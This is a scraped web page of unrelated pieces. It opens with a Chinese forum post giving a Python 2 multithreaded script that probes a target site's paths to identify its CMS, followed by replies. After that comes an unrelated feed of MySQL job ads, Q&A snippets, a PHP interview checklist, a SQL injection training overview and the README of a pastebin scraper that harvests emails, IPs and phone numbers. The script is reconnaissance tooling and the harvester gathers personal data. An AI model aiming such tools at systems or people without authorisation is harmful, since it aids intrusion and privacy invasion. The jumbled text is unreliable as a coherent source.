For a complete dictionary, go search for one yourself. I'm using deepin; the errors on Windows were too annoying and I really couldn't be bothered to fix them...
[Python]
#-*- coding: UTF-8 -*-
import os
import threading
import urllib2

identification = False
g_index = 0
lock = threading.Lock()

def list_file(dir):
    files = os.listdir(dir)
    return  files

def request_url(url='', data=None, header={}):
    page_content = ''
    request = urllib2.Request(url, data, header)

    try:
        response = urllib2.urlopen(request)
        page_content = response.read()
    except Exception, e:
        pass

    return page_content

def whatweb(target):
    global identification
    global g_index
    global cms

    while True:
        if identification:
            break

        if g_index > len(cms)-1:
            break

        lock.acquire()
        eachline = cms[g_index]
        g_index = g_index + 1
        lock.release()

        if len(eachline.strip())==0 or eachline.startswith('#'):
            pass
        else:
            url, pattern, cmsname = eachline.split('||||')
            html = request_url(target+url)
            rate = float(g_index)/float(len(cms))
            ratenum = int(100*rate)

            if pattern.upper() in html.upper():
                identification = True
                print " CMS:%s,Matched URL:%s" % (cmsname.strip('\n').strip('\r'), url)
                break
    return


if __name__ == '__main__':
    print '''
          __        ___           _    ____ __  __ ____  
          \ \      / / |__   __ _| |_ / ___|  \/  / ___| 
           \ \ /\ / /| '_ \ / _` | __| |   | |\/| \___ \ 
            \ V  V / | | | | (_| | |_| |___| |  | |___) |
             \_/\_/  |_| |_|\__,_|\__|\____|_|  |_|____/ 
    '''
    threadnum = int(raw_input(' Please input your threadnum:'))
    target_url = raw_input(' Please input your target:')

    f = open('./cms.txt')
    cms = f.readlines()
    threads = []

    if target_url.endswith('/'):
        target_url = target_url[:-1]

    if target_url.startswith('http://') or target_url.startswith('https://'):
        pass
    else:
        target_url = 'http://' + target_url

    for i in range(threadnum):
        t = threading.Thread(target=whatweb, args=(target_url,))
        threads.append(t)

    print ' The number of threads is %d' % threadnum
    print 'Matching.......'
    for t in threads:
        t.start()

    for t in threads:
        t.join()

    print " All threads exit"

image
Cool... and that is a simple CMS identification script.
I haven't written an article in a while, so I'm a bit rusty; please bear with me.
Finally, let me share a song: Kris Wu's 天地 (Tian Di).
天地
I especially like the part that goes "people of the jianghu say I can't make it, the ancients say distance reveals a horse's strength; walk with me, venture through the world with me, I never settle when it comes to my fate".
Also, I'm out of money for food, so please help a kid out, everyone.
image
End of this installment.
Cheering for the expert; the content is very practical. I study every chapter carefully and practice hands-on, and my Python is improving quickly.
The expert's Python multithreading is slick, much respect. Magic coins! Thanks for sharing. Awesome, the article is great. Caught an expert in the wild; the writing is brilliant. Wow, 阿甫哥哥 finally posted an update. Claiming the first reply, hahaha.
Just dropping by for a look. Marking this. Hello boss, goodbye boss. Help the kid out, haha. Cheeky. I'll go try it too. Thanks to the expert for sharing.
          (IT) Java/ESB Developer      Cache   Translate Page   Web Page Cache   

Rate: £550 - £650 per Day   Location: London   

2 x Java/ESB Developers - Investment Banking You will work towards implementing new and enhancing existing application integration projects within the Middleware framework. Key Skills Minimum of 7 years Java Development experience Integration architecture and design experience Experience in using Object Oriented Analysis, in particular UML Experience in using TDD/BDD agile methodology Experience in integrating widely used trading, risk and processing platforms such as Murex or similar (with good knowledge of the underlying messaging schemas such as MxML) Experience with Publish/Subscribe messaging paradigms, distributed transaction processing based on JTA/JTS Specifically experience with JBoss, JMS, Spring, Hibernate Strong UNIX skills in particular Linux Strong relational database skills - Sybase, SQL Server, MySQL Knowledge of source control such as Subversion Experience of using JUnit and jMock Experience in defining and implementing web services (REST paradigm) and data services (eg OData) Desired Skills Experience in integrating widely used trading, risk and processing platforms such as Murex or similar (with good knowledge of the underlying messaging schemas such as MxML) A broad understanding of Fixed Income, Equity and/or Futures processing through investment banking experience Experience of working with XML based technologies such as XSLT, JAXB Experience in implementing vendor proprietary Real Time connectors using JCA Experience of Subversion, Maven and Atlassian ALM/SDLC tools (Jira, Bamboo, Crucible, FishEye, Confluence) or Hudson Experience with AMQP Experience with WCF, MSMQ integration Experience with Fuse ESB or similar Experience with NoSQL such as MongoDB Morgan McKinley is acting as an Employment Agency in relation to this vacancy. Please note that any references to salary or pay rates in this advertisement and in the salary refinement section are indicative only and should only be used as a guide.
 
Rate: £550 - £650 per Day
Type: Contract
Location: London
Country: UK
Contact: Donato Basso
Advertiser: Morgan McKinley UK
Start Date: ASAP
Reference: JS-BBBH695530

          Create a subscription system with my data.      Cache   Translate Page   Web Page Cache   
Hi, we have two WordPress websites, abc.com and blog.abc.com, from which we are generating leads. Now we want a subscription platform to sell these leads online; we have selected such an application... (Budget: ₹1500 - ₹12500 INR, Jobs: HTML, Laravel, MySQL, PHP, Website Design)
          MySQL 8.0      Cache   Translate Page   Web Page Cache   
Hi, I'm totally new to MySQL and trying to find some advice. Has anyone seen MySQL 8.0 error 1001? What does this error code mean? Thanks very much in advance for all your help.
          Insert query for dynamic form using php      Cache   Translate Page   Web Page Cache   
Hey guys :) I'm currently working on a web project in which I use MySQL, Bootstrap, PHP and JavaScript. I have successfully generated dynamic forms using PHP, and I'm using mysqli commands. I use dynamic forms because otherwise I would have to create hundreds of HTML pages. So by doing this ...
          How to use mysqli_real_escape_string with arrays ?      Cache   Translate Page   Web Page Cache   
Recently I've been trying to pass text box, radio button and checkbox values to the database. For clarity, I'll provide a simple version of the form.




          CRM like "Zoho"      Cache   Translate Page   Web Page Cache   
I am looking for a CRM like Zoho. Web app has to be identical & should have features exactly similar to Zoho CRM. Web app in PHP language with multi language. Bid only if you have a proper document and or demo... (Budget: €250 - €750 EUR, Jobs: CRM, HTML, MySQL, PHP, Software Architecture)
          Cakephp Tree Menu using Bootstrap Collapsible accordion      Cache   Translate Page   Web Page Cache   
Hi, I need to build the controller and view in CakePHP for a collapsible tree menu with a Bootstrap accordion, like this: https://bootsnipp.com/snippets/featured/collapsible-tree-menu-with-accordion The... (Budget: $10 - $30 USD, Jobs: CakePHP, Javascript, jQuery / Prototype, MySQL, PHP)
          Software Developer - SkipTheDishes - Saskatoon, SK      Cache   Translate Page   Web Page Cache   
Experience with Java 8, Python, React or MySQL is an asset. Apply your understanding of software architecture, and cutting-edge tools and technology to maintain...
From SkipTheDishes - Sat, 23 Jun 2018 06:14:46 GMT - View all Saskatoon, SK jobs
          MySQL for Advanced Analytics Tips, Tricks, & Techniques      Cache   Translate Page   Web Page Cache   

MySQL for Advanced Analytics Tips, Tricks, & Techniques

MySQL for Advanced Analytics: Tips, Tricks, & Techniques
MP4 | Video: 720p | Duration: 41:58 | English | Subtitles: VTT | 125.6 MB




          Magento integration with Totvs Protheus      Cache   Translate Page   Web Page Cache   
Good morning. We would like to develop a Magento module to fully integrate the platform with Totvs Protheus. We are interested in professionals who have already developed something related to Magento x Protheus and have real command of the integration... (Budget: $250 - $750 USD, Jobs: ERP, Magento, MySQL, PHP, Software Architecture)
          AMD EPYC Performance Testing… or Don’t get on the wrong side of SystemD      Cache   Translate Page   Web Page Cache   
Ubuntu 16 AMD EPYC

Ever since AMD released their EPYC CPU for servers I wanted to test it, but I did not have the opportunity until recently, when Packet.net started offering bare metal servers for a reasonable price. So I started a couple of instances to test Percona Server for MySQL under this CPU. In this benchmark, I discovered some […]

The post AMD EPYC Performance Testing… or Don’t get on the wrong side of SystemD appeared first on Percona Database Performance Blog.


          dotConnect for MySQL 8.11      Cache   Translate Page   Web Page Cache   
ADO.NET provider for MySQL with Entity Framework,LinqConnect,NHibernate Support
          Build a functional Website      Cache   Translate Page   Web Page Cache   
- capable of storing reviews - search through listings - book appointment times - account signup - B2B and B2C (Budget: $30 - $250 CAD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          PHP, Symfony framework, remote work      Cache   Translate Page   Web Page Cache   
I need to improve a project on its 6 main points; the work requires a commitment of 4 hours per day, is done remotely, and is carried out in coordination with the project lead. (Budget: $2 - $8 USD, Jobs: MySQL, PHP, Symfony PHP)
          oDoo Customization      Cache   Translate Page   Web Page Cache   
We need help with some setup/customization or apps etc within Oddo.sh (Budget: $8 - $15 USD, Jobs: ERP, MySQL, PHP, Python, Software Architecture)
          Software Developer (PHP) at Supermart.ng      Cache   Translate Page   Web Page Cache   
Supermart.ng, Nigeria's leading online supermarket. If you desire to work in a fast-paced environment, and experience rapid personal and career growth while making a tremendous impact in society, then this might be the company for you. We offer a truly entrepreneurial experience in a fast-paced, yet structured environment, working within a proudly Nigerian company built by young, talented and dynamic entrepreneurs. We operate a structured yet fun and easy-going work environment, and also run a management trainee and in-house entrepreneurial mentorship program. Job description: design, build, and maintain efficient, reusable, and reliable PHP code; integration of data storage solutions (MySQL, MongoDB); building RESTful APIs; identifying bottlenecks and bugs, and devising solutions to these problems; helping maintain code quality, organization and automation; writing automated tests using Codeception; solving complex performance problems and architectural challenges.

Apply at https://ngcareers.com/job/2018-07/software-developer-php-at-supermart-ng-388/


          Mobile application developer - Tundra Technical - Québec City, QC      Cache   Translate Page   Web Page Cache   
Programming in Java, Objective-C, C++, ASP .Net, C#, MySQL, HTML5, CSS3, XML, JS, AJAX. Position type:....
From Indeed - Tue, 10 Jul 2018 15:21:48 GMT - View all Québec City, QC jobs
          Web development      Cache   Translate Page   Web Page Cache   
I need a website repaired. (Budget: $250 - $750 USD, Jobs: MySQL, Shopify, System Admin, WordPress)
          XAMPP for Windows 7.2.7      Cache   Translate Page   Web Page Cache   
Description: XAMPP for Windows is an easy to install Apache distribution for Windows containing MySQL, PHP and Perl. XAMPP is an Apache distribution containing MySQL, PHP and Perl. Many people know from their own experience that it's not easy to install an Apache web server and it gets harder if you want to add MySQL, PHP and […]
          Senior Network Administrator - Northbay - Lahore      Cache   Translate Page   Web Page Cache   
Installation, configuration, backup and administration of MySQL, MSSQL, Postgres and NoSQL (MongoDB) database servers....
From Northbay - Mon, 09 Jul 2018 06:40:14 GMT - View all Lahore jobs
           URGENT vacancy for web designer/developer in Tata       Cache   Translate Page   Web Page Cache   
Salary period: Yearly, Position type: Full-time,
URGENT vacancy for web designer/developer in Tata Consultancy Services (TCS)
B.Tech/BCA; HTML/Java/JavaScript/jQuery/JSON/MySQL... https://www.olx.in/hi/item/urgent-vacancy-for-web-designer-developer-in-tata-ID1lOafH.html
          Oscar Associates Limited: PHP Developer      Cache   Translate Page   Web Page Cache   
£30k - £40k pa + Benefits: Oscar Associates Limited: PHP Developer | PHP, Laravel, HTML | Harpenden | £40,000 PHP, Laravel, HTML, CSS, MySQL, Back-end, LAMP, Developer, Experience, Web. The Role PHP Developer | We are currently on the lookout for a PHP 7, Laravel, Symfony, HTML, CSS, Developer to join an es Hatfield
          Rui Backup (睿备份, system backup file download) V4.0.7 portable edition      Cache   Translate Page   Web Page Cache   
Rui Backup (system backup file download) is a standalone engine for real-time database monitoring and backup. It is fully "portable": no installation required and easy to operate. It supports full, incremental, and transaction-log backups of local and remote MSSQL, Oracle, MySQL, PostgreSQL, Dameng and other databases across platforms. Backup jobs are configured in a Windows-Task-Scheduler-like fashion and can be freely combined into unlimited composite backup jobs; backup files can be zip-compressed and then transferred and stored via LAN/FTP/cloud/email, with flexible deletion of backup files by retention period and storage location; restoring third-party database backup files is supported; the proprietary "Rui Cloud" technology provides end-to-end and platform-to-device push of backup commands, log management, and more. Highlights: 1. The efficient database backup engine combines backup job analysis with database back…
          Sales and marketing and Web Programmer      Cache   Translate Page   Web Page Cache   
We are hiring a Sales and Web Designer. - Female with pleasing personality (20-25 years old) for sales. - At least 1 year of experience in sales and field marketing. - 4-year graduate. - Ability to multitask. - Must be familiar with Microsoft Office applications. - Good communication, presentation and writing skills. - Programming skills: HTML5, CSS, PHP, MySQL, Photoshop. - Familiar with WordPress and similar CMSs. -
          How to skip the validation of primary Key in MYSQL (1 reply)      Cache   Translate Page   Web Page Cache   
I am trying to migrate a database from Oracle to MySQL. Oracle has duplicate values in a table; I am assuming the primary key might have been enabled with the NOVALIDATE option. Could someone point me to the equivalent way to do the same thing in MySQL?

Note: I have tried 'alter table table_name add primary key (column1, column2) enable novalidate', but this didn't work.
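
MySQL has no equivalent of Oracle's ENABLE NOVALIDATE: a primary key is always validated, so the duplicate rows have to be removed (or the table left without that key) before the constraint can be added. Below is a minimal sketch of the usual workaround — copy the data into a table that already carries the key and let INSERT IGNORE drop the duplicates, then swap the tables. The table name t, the key columns, and the connection settings are placeholders, and mysql-connector-python is just one possible client:

import mysql.connector  # assumption: mysql-connector-python is installed

conn = mysql.connector.connect(host="localhost", user="app", password="secret", database="mydb")
cur = conn.cursor()

# 1. Inspect which (column1, column2) pairs are duplicated.
cur.execute("""
    SELECT column1, column2, COUNT(*) AS cnt
    FROM t
    GROUP BY column1, column2
    HAVING cnt > 1
""")
for row in cur.fetchall():
    print(row)

# 2. Copy the data into a table that already has the primary key;
#    INSERT IGNORE silently drops the rows that would violate it.
cur.execute("CREATE TABLE t_dedup LIKE t")
cur.execute("ALTER TABLE t_dedup ADD PRIMARY KEY (column1, column2)")
cur.execute("INSERT IGNORE INTO t_dedup SELECT * FROM t")

# 3. Swap the tables once you have verified the result.
cur.execute("RENAME TABLE t TO t_old, t_dedup TO t")

conn.commit()
cur.close()
conn.close()

Note that which of the duplicate rows survives is simply whichever one is inserted first, so if the duplicates differ in their other columns you should decide explicitly which row to keep before adding the key.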
          Complete Project Stock Market Data with Custom Technical Analysis Filtering (Historical and RealTime)      Cache   Translate Page   Web Page Cache   
Simply putting it together, long story short. Need a custom Technical Analysis Real Time filtering and coding platform along with a data scraped from multiple reliable sources. Exchanges to work with (NSE, BSE and if possible MCX) ... (Budget: ₹1500 - ₹12500 INR, Jobs: Javascript, JSP, MySQL, PHP, Web Development)
          Problem with a WordPress migration      Cache   Translate Page   Web Page Cache   
I am migrating my WordPress site to another server. I have already completed the whole migration, but an error message related to the W3 TOTAL CACHE plugin keeps appearing; I don't know why it is no longer installed, and I can't find it to install it again... (Budget: $30 - $250 USD, Jobs: CSS, HTML, MySQL, PHP, WordPress)
          Percona XtraDB Cluster Analysis      Cache   Translate Page   Web Page Cache   
Hi, I have been hired as a consultant for a week in order to investigate a MySQL system which has been having performance issues. I arrived on the...
          A Big Summary of PHP Interview Knowledge (PHP 面试知识大汇总)      Cache   Translate Page   Web Page Cache   

This repository mainly collects the knowledge points that are frequently asked in PHP interviews in China. It only points out the topics; you still need to find the relevant material and study it systematically yourself. I hope you will not only understand what each thing is, but also why it is that way and the principles behind it.

If you have very systematic material for a given topic, pull requests adding links are welcome.

Basics

  • Know most of the array handling functions
  • String handling functions (and how the mb_* family differs)
  • & references, analyzed with examples
  • The difference between == and ===
  • The difference between isset and empty
  • Understand all of the magic methods
  • The difference between static, $this, and self
  • The difference between private, protected, public, and final
  • OOP concepts
  • When to use abstract classes vs. interfaces
  • What a Trait is
  • The difference between echo, print, and print_r
  • The difference between __construct and __destruct
  • What static does (inside a class vs. inside a function)
  • What __toString() does
  • The difference between single quotes ' and double quotes "
  • Common HTTP status codes and what each of them means
  • What 301 means, and what about 404

Intermediate

  • How autoloading and Composer work
  • Session sharing and session lifetime
  • Exception handling
  • How to iterate over an object with foreach
  • How to access an object like an array: $obj[key]
  • How to call an object like a function: $obj(123);
  • What yield is; give a usage scenario
  • What PSR is; PSR-1, 2, 4, 7
  • How to get the client IP and the server IP address
  • How to enable PHP error display
  • How to return a 301 redirect
  • How to find the extension installation path
  • How string/number comparison works; watch out for octal (leading 0) and hexadecimal (leading 0x)
  • What a BOM header is and how to remove it
  • What MVC is
  • How dependency injection is implemented
  • How to execute commands asynchronously
  • What a template engine is, what problem it solves, and how it works (Smarty, Twig, Blade)
  • How to implement method chaining: $obj->w()->m()->d();
  • Using the Xhprof and Xdebug profiling/debugging tools
  • The difference between indexed arrays [1, 2] and associative arrays ['k1'=>1, 'k2'=>2]
  • Dependency injection principles

Practice

  • Given a two-dimensional array, sort it by a given field
  • How to validate the type of an uploaded file, e.g. allowing only jpg uploads
  • Swap the values of two variables without a temporary variable: $a=1; $b=2; => $a=2; $b=1;
  • strtoupper garbles Chinese characters; how do you solve it? php echo strtoupper('ab你好c');
  • The differences between WebSocket, long-polling, and Server-Sent Events (SSE)
  • What the "Headers already sent" error means and how to avoid it

Algorithms

  • Quicksort (write it by hand)
  • Bubble sort (write it by hand)
  • Binary search (be familiar with it)
  • The KMP search algorithm (be familiar with it)
  • Depth-first and breadth-first search (be familiar with them)

Data structures (be familiar with them)

  • Heap and stack characteristics
  • Queues
  • Hash tables
  • Linked lists

Comparisons

  • Cookies vs. sessions
  • GET vs. POST
  • include vs. require
  • include_once vs. require_once
  • Memcached vs. Redis
  • The MySQL storage engines and their differences (the MyISAM vs. InnoDB difference will definitely be asked)
  • HTTP vs. HTTPS
  • Apache vs. Nginx
  • define() vs. const
  • traits vs. interfaces, and what pain point traits solve
  • Git vs. SVN

Databases

  • MySQL
    • CRUD
    • JOIN, LEFT JOIN, RIGHT JOIN, INNER JOIN
    • UNION
    • Combined GROUP BY + COUNT + WHERE cases
    • Common MySQL functions such as now(), md5(), concat(), uuid(), etc.
    • When to use 1:1, 1:n, and n:n relationships
    • Database optimization techniques
      • Indexes and composite indexes (and the conditions under which they are actually used)
      • Splitting databases and tables (horizontal and vertical splitting)
      • Partitioning
      • Be able to use EXPLAIN to analyze SQL performance problems and understand what each field means
      • The slow log (what it is for and when you need it)
  • MSSQL (be familiar with it)
    • Query the 5 most recent rows
  • NOSQL
    • Redis, Memcached, MongoDB
    • Comparison and applicable scenarios
    • What did you use before, to solve which problem, and why did you pick it?

Servers

  • Check CPU, memory, time, OS version and similar information
  • Find files with find and grep
  • Process text with awk
  • Find the directory a command lives in
  • Have you compiled PHP yourself? How do you enable the readline feature?
  • How to check the memory and CPU usage of PHP processes
  • How to add an extension to PHP
  • Change the PHP session storage location; change INI configuration parameters
  • What kinds of load balancing exist; pick one you know and explain how it works
  • How does master-slave (M-S) database replication synchronize? Push or pull? Can it fall out of sync, and what do you do then?
  • How do you guarantee data availability, so that even if the database is dropped you can recover to within minutes? What would you do?
  • Too many database connections, exceeding the maximum: how do you optimize the architecture, and where do you start?
  • What are the likely causes of a 502? How do you troubleshoot it? And a 504?

Architecture

  • Ops-leaning (be familiar with):
    • Load balancing (Nginx, HAProxy, DNS)
    • Master-slave replication (MySQL, Redis)
    • Data redundancy and backups (how MySQL incremental and full backups work)
    • Monitoring checks (along the two dimensions of liveness and service availability)
    • The purpose and principles of MySQL/Redis/Memcached proxies and clusters
    • Sharding
    • High-availability clusters
    • RAID
    • Compiling from source, memory tuning
  • Caching
    • Where in your work did you need caching, and briefly, why in each case
  • Search solutions
  • Performance tuning
  • Monitoring schemes across the different dimensions
  • Centralized log collection and processing
  • Internationalization
  • Database design
  • Static content generation

Frameworks

  • ThinkPHP (TP), CodeIgniter (CI), Zend (non-OOP family)
  • Yaf, Phalcon (C extension family)
  • Yii, Laravel, Symfony (pure OOP family)
  • Swoole, Workerman (network programming frameworks)
  • Directions along which to compare frameworks
    • Whether it is pure OOP
    • How class libraries are loaded (hand-written autoload vs. the Composer standard)
    • Ease of use (CI is a basic framework; Laravel is a high-productivity framework; how many base components it ships with)
    • Black box or not (compared with the C extension family)
    • Runtime speed (e.g. Laravel loads a huge amount of stuff)
    • Memory usage

Design patterns

  • Singleton (important)
  • Factory (important)
  • Observer (important)
  • Dependency injection (important)
  • Decorator
  • Proxy
  • Composite

Security

  • SQL injection
  • XSS and CSRF
  • Input filtering
  • Cookie security
  • Disabling the mysql_* family of functions
  • How user passwords should be stored in the database to be safe
  • CAPTCHA session issues
  • Secure session IDs (so that even if intercepted they cannot be replayed)
  • Directory permission security
  • Local and remote file inclusion
  • Uploading PHP scripts through file upload
  • Script execution via the eval function
  • Disabling dangerous functions with disable_functions
  • A separate FPM user and group, with specific permissions per directory
  • Understand the difference between hashing and encryption

Advanced

  • The underlying implementation of PHP arrays (HashTable + linked list)
  • How copy-on-write works, and when GC happens
  • The PHP process model, ways of inter-process communication, and the difference between processes and threads
  • The core principle behind yield
  • How PDO prepare works
  • The differences between PHP 7 and PHP 5
  • Scenarios where Swoole fits, and how its coroutines are implemented

Front end

  • Getting DOM nodes and attributes with plain JavaScript
  • The box model
  • Priority of CSS files, style tags, and inline style attributes
  • Execution order of HTML and JS (page JS runs top to bottom)
  • JS array operations
  • Type checking
  • this scoping
  • Concrete usage analysis of .map() together with this
  • Reading and writing cookies
  • jQuery operations
  • Ajax requests (synchronous vs. asynchronous); disabling caching with a random number
  • What the benefits of Bootstrap are
  • The N solutions for cross-origin requests
  • New technologies (be familiar with them)
    • ES6
    • Modularization
    • Bundling
    • Build tools
    • vue, react, webpack
    • Front-end MVC
  • Optimization
    • The browser's per-domain concurrency limit
    • Static resource caching and 304 (how If-Modified-Since and ETag work)
    • Combining small icons into one image positioned with CSS, to reduce requests
    • Combining static resources into a single request and compressing them
    • CDN
    • Lazy loading and preloading of static resources
    • keep-alive
    • Why CSS goes in the head and JS at the end of the body (and the reasoning)

Networking

  • Converting an IP address to an INT
  • What 192.168.0.1/16 means
  • What DNS is mainly for
  • The differences between IPv4 and IPv6

Network programming

  • The TCP three-way handshake
  • The differences between TCP and UDP, and when to use each
  • Ways to make UDP highly reliable (be familiar with them)
  • How to solve TCP "sticky packet" (message framing) problems
  • Why heartbeats are needed
  • What a long-lived connection is
  • How HTTPS guarantees security
  • The difference between streams and datagrams
  • The ways of inter-process communication, and which one is fastest
  • What happens on fork()?

APIs

  • What RESTful is
  • How to support DELETE requests on browsers that do not support them
  • What the APP_ID / APP_SECRET of a typical API is mainly for; describe the flow
  • How to guarantee that API request data has not been tampered with
  • The difference between JSON and JSONP
  • The difference between data encryption and signature verification
  • What RSA is
  • How to handle API version compatibility
  • Rate limiting (leaky bucket, token bucket)
  • The main scenarios where OAuth 2 is used
  • JWT
  • In PHP, the difference between json_encode(['key'=>123]); and return json_encode([]);, what problems it can cause, and how to solve them

Bonus points

  • Know the features of the common languages and which scenarios each suits.
    • PHP vs. Golang
    • PHP vs. Python
    • PHP vs. Java
  • Know PHP extension development
  • Be proficient in C

Disclaimer

This material does not target any particular company, and no responsibility is taken for any effect it may have on you; please be aware of this.

Good luck


          A 10-Minute Summary of All Types of SQL Injection      Cache   Translate Page   Web Page Cache   

I have recently been running internal SQL injection training at my company. It was honestly a headache: everyone knows SQL injection, so there isn't much left to say. I kept wondering what real substance I could bring, since I didn't want everyone to waste two hours listening to things they already know. Then it occurred to me that while everybody knows SQL injection and understands how it works, most people have probably never summarized all of its types, let alone organized the related knowledge along four dimensions. That is how this write-up came about.

Sharing the slides

In this talk I do my best to use the most minimal code, the shortest PoCs, and the most classic examples to quickly summarize every type of SQL injection. I hope that in these 10 minutes you can get an overall picture of SQL injection.

Figure 1 - Summary of all types of SQL injection

Closing remarks

My summary was inspired by master Adema's (阿德马) classification of SQL injection and by the content of the "MySQL Injection Bible" (《mysql注入天书》), combined with some thinking of my own. The classification is still somewhat subjective, and parts of it are debatable — for example whether stacked injection counts as injection with visible output, or whether error-based injection counts as blind injection. I can only update the slides as my own understanding of SQL injection deepens.

References

A detailed explanation of the basics of manual SQL injection (手动SQL注入基础详解)

https://github.com/lcamry/sqli-labs


          GitHub - needmorecowbell/sniff-paste: Pastebin OSINT Harvester      Cache   Translate Page   Web Page Cache   

README.md

Sniff-Paste: OSINT Pastebin Harvester


Multithreaded pastebin scraper, scrapes to mysql database, then reads pastes for noteworthy information.

Use run.sh to go through the entire process of collection, logging, and harvest automatically. The scraper can be set to a paste limit of 0 to scrape indefinitely. If scraped indefinitely, press ctrl + c to stop scraping and start analysis.

There are various tools for handling the harvested lists in the util folder.

Installation

sudo apt install libxslt-dev python3-lxml nmap xsltproc fping mysql-server

pip3 install -r requirements.txt

  • Create database named pastes in mysql server
  • Fill in settings.ini

./run.sh

This will scrape pastebin for the latest number of pastes, then run analysis for ip addresses, emails, and phone numbers. It filters out duplicates and runs scans on some of the harvested data.
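
The analysis stage boils down to pattern matching over the raw paste text. The snippet below is not taken from the repository — it is a small, self-contained illustration of that idea, pulling email addresses and IPv4-looking strings out of a blob of text with regular expressions (the patterns and the function name are invented for the example):

import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def harvest(text):
    """Return de-duplicated emails and IPv4 candidates found in a paste."""
    emails = sorted(set(EMAIL_RE.findall(text)))
    ips = sorted(set(ip for ip in IPV4_RE.findall(text)
                     if all(0 <= int(part) <= 255 for part in ip.split("."))))
    return {"emails": emails, "ips": ips}

if __name__ == "__main__":
    sample = "contact admin@example.com or ssh to 192.0.2.10 (not 999.1.1.1)"
    print(harvest(sample))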


          Finish developing a CMS built on the CodeIgniter framework      Cache   Translate Page   Web Page Cache   
Good afternoon. We need a developer who specializes in the CodeIgniter framework to extend an existing project. The project generates video templates and has a payment (subscription) page. The following tasks need to be completed... (Budget: $8 - $10 USD, Jobs: Codeigniter, MySQL, PHP)
          Web Development & Design Python, JavaScript, PHP HTML & CSS      Cache   Translate Page   Web Page Cache   
Web Development & Design: Python, JavaScript, PHP, HTML & CSS
MP4 | Video: AVC 1280x720 | Audio: AAC 44KHz 2ch | Duration: 4.5 Hours | Lec: 29 | 573 MB
Genre: eLearning | Language: English

Web Development For Developers: CSS, HTML, MySQL, Bootstrap, Front-End & Backend, JavaScript, Jasmine & Regular Expressions

What if you could learn that?

For less than a movie ticket, you will get over 4 hours of video lectures and the freedom to ask me any questions regarding the course as you go through it. :)


          Integration Architect - Silverline Jobs - Casper, WY      Cache   Translate Page   Web Page Cache   
Strong understanding of relational databases structure and functionality and experience with all major databases - Microsoft SQL Server, MYSQL, postgreSQL or...
From Silverline Jobs - Tue, 10 Jul 2018 00:33:35 GMT - View all Casper, WY jobs
          Technical Architect (Salesforce experience required) Casper - Silverline Jobs - Casper, WY      Cache   Translate Page   Web Page Cache   
Competency with Microsoft SQL Server, MYSQL, postgreSQL or Oracle. BA/BS in Computer Science, Mathematics, Engineering, or similar technical degree or...
From Silverline Jobs - Sat, 23 Jun 2018 06:15:28 GMT - View all Casper, WY jobs
          Software Developer - State of Wyoming - Cheyenne, WY      Cache   Translate Page   Web Page Cache   
Preference may be given to those with experience in MS SQL Server or MYSQL. This position is to provide development support in the design and implementation of... $4,506 - $5,632 a month
From State of Wyoming - Thu, 28 Jun 2018 20:49:57 GMT - View all Cheyenne, WY jobs
          Integration Architect - Silverline Jobs - Cheyenne, WY      Cache   Translate Page   Web Page Cache   
Strong understanding of relational databases structure and functionality and experience with all major databases - Microsoft SQL Server, MYSQL, postgreSQL or...
From Silverline Jobs - Tue, 10 Jul 2018 00:33:35 GMT - View all Cheyenne, WY jobs
          Features Addition in magento 1.9 website www.hotelvaluemart.com      Cache   Translate Page   Web Page Cache   
Job 1 : Module implementation for capability to add order in magento in back date (or just create order from magento from admin and then, modify its date). Job 2: Add upload sections under order, where PDF of invoices, transport papers can be uploaded... (Budget: ₹12500 - ₹37500 INR, Jobs: eCommerce, HTML, Magento, MySQL, PHP)
          Regular expressions vs. metacharacters: which does LIKE in SQL accept...      Cache   Translate Page   Web Page Cache   
About regular expressions and metacharacters: when you use LIKE in SQL, which of the two can you use — metacharacters or regular expressions? Can SQL even use both regular expressions and metacharacters in the first place? (This is MySQL.) Also, do regular expressions and metacharacters differ between programming languages and SQL dialects (is there no common standard)? And, if you happen to know, please also explain how Linux distinguishes between regular expressions and metacharacters when using them.
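
To sketch an answer for the MySQL case the question mentions: LIKE only understands the SQL wildcard metacharacters % (any sequence) and _ (any single character), not regular expressions, while regular expressions are available through the separate REGEXP/RLIKE operator; and yes, the exact syntax and regex flavour do differ between databases and programming languages. A small illustration with made-up table and column names:

# Two ways of matching names that start with "tanaka" in MySQL.
like_query = """
    SELECT * FROM users
    WHERE name LIKE 'tanaka%'      -- %  = any sequence of characters, _ = any single character
"""

regexp_query = """
    SELECT * FROM users
    WHERE name REGEXP '^tanaka'    -- full regular expression syntax (anchors, classes, etc.)
"""

# LIKE treats regex syntax such as ^ or .* literally, so this matches almost nothing:
broken_query = "SELECT * FROM users WHERE name LIKE '^tanaka.*'"

for q in (like_query, regexp_query, broken_query):
    print(q.strip())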
          Web Developers(Php & MySQL) - ADVT Software Services - Visakhapatnam, Andhra Pradesh      Cache   Translate Page   Web Page Cache   
Advanced level of knowledge in file, session, ftp, string, object design and paypal accounts setup and related php programming....
From ADVT Software Services - Sat, 23 Jun 2018 07:57:17 GMT - View all Visakhapatnam, Andhra Pradesh jobs
          Project for Richa J.      Cache   Translate Page   Web Page Cache   
Hi Richa J. this is regarding the Oil and Gas Service website you have bid on. I am willing to award you the contest, and add an additional 150$ CAD for the full website with our edits and changes. This means further customizing our site to requirements... (Budget: $150 CAD, Jobs: Hire me, HTML, MySQL, PHP, SEO, Website Design)
          Transfer data from the MySQL of a custom-built portal to WordPress      Cache   Translate Page   Web Page Cache   
I need to transfer data from one mysql base to another. From old to new base. (Budget: €30 - €250 EUR, Jobs: Graphic Design, PHP, Website Design)
          Distributed transaction solution — handling abnormal flows in message delivery consistency      Cache   Translate Page   Web Page Cache   

The design approach of the distributed transaction solution presented in this tutorial applies to any microservice architecture project and is independent of the programming language; the tutorial focuses on explaining the design ideas behind the solution.

The sample project in the tutorial is implemented on top of the micro-payment system open-sourced by Longguo Academy (龙果学院), using Dubbo as the service framework. The distributed transaction solution implemented in the tutorial works for any microservice architecture system in the Java ecosystem, regardless of the specific development framework.

Technologies used in the tutorial's sample project and the corresponding environment:

Dubbo, Spring, Spring MVC, MyBatis, Druid, JDK 7 (or JDK 8), MySQL 5.6, Tomcat

Author: 小开发仔
Notice: This is an original article published on the ITeye website; reposting it on any website without the author's written permission is strictly prohibited and will be prosecuted.







          Job Vacancy: Freelance Web Programming Instructor      Cache   Translate Page   Web Page Cache   
